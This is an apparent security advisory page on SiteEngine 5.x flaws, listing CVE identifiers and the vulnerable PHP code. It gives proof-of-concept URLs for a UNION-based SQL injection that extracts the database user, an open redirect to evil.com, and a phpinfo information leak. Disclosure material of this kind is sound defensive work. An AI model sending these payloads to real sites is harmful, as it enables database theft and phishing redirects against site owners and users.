SiteEngine 5.x Multiple Remote Vulnerabilities

2008-10-24 / 2008-10-25
Credit: xuanmumu_at_gmail.com
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-7267 | CVE-2008-7268 | CVE-2008-7269
CWE: CWE-89
CWE-200

Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability. -=0x01=- SQL injection Vulnerability vul code like this: if ( intval( $id ) ) { require_once( $site_engine_root."lib/rss.php" ); $sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'"; POC: http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,1 1%20/* This vulnerability exist in board.php�� -=0x02=- URI Redirection Vulnerability POC: http://www.test.com/api.php?action=logout&forward=http://evil.com -=0x02=- Information Disclosure Vulnerability POC: http://www.test.com/misc.php?action=php_info ForFun~ -=EOF=-

References:

http://xforce.iss.net/xforce/xfdb/46180
http://www.securityfocus.com/archive/1/archive/1/497747/100/0/threaded
http://www.milw0rm.com/exploits/6823
http://secunia.com/advisories/32404


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top